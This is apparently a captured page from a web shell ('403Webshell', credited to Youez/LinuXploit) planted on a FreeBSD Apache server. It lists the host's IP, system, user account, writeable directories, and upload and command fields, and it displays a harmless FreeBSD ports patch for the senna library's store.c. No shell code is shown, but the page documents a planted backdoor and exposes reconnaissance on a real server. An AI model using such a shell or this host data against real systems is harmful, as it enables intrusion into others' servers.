403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/textproc/senna/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/textproc/senna/files/patch-store.c
--- ./lib/store.c.orig	2008-06-12 14:18:12.000000000 +0900
+++ ./lib/store.c	2008-11-13 18:21:14.000000000 +0900
@@ -20,6 +20,7 @@
 #include "sym.h"
 #include "store.h"
 #include "ctx.h"
+#include <stddef.h>
 #include <string.h>
 
 /* rectangular arrays */
@@ -1735,10 +1736,12 @@
 sen_vgram_buf_add(sen_vgram_buf *b, sen_id tid)
 {
   uint8_t dummybuf[8], *dummyp;
+  ptrdiff_t pd;
   if (b->tvp < b->tve) { *b->tvp++ = tid; }
   dummyp = dummybuf;
   SEN_B_ENC(tid, dummyp);
-  simple_sum += dummyp - dummybuf;
+  pd = dummyp - dummybuf;
+  simple_sum += (int)pd;
   return sen_success;
 }
 

Youez - 2016 - github.com/yon3zu
LinuXploit